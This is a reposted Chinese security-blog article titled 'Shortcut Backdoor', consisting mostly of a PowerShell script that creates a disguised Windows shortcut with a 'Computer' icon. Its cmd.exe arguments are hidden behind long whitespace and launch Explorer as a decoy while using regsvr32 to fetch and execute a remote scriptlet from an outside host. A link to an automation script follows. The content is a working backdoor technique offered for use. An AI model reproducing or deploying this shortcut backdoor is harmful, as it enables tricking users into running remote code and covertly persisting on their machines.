Shortcut Backdoor-Shortcut Backdoor-华盟网

Shortcut Backdoor

华盟学院山东省第二期线下学习计划

PS code:

$file = Get-Content "C:\Users\evi1cg\Desktop\backdoor\link\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Users\evi1cg\Desktop\backdoor\link\计算机.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.WindowStyle = 7
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,15"
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $file
$Shortcut.Save()


     test.txt:

/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | regsvr32.exe /u /s /i:https://evi1cg.me/scripts/calc.png scrobj.dll

DEMO:  


写了一个自动化的脚本,地址如下:


https://gist.github.com/Ridter/a360f94d8ac9a8c30227e3812dfbb329

DEMO:


文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/Shortcut_Backdoor.html

本文由来源 Evi1cg's blog ,由 hoxton 整理编辑,其版权均为 Evi1cg's blog 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论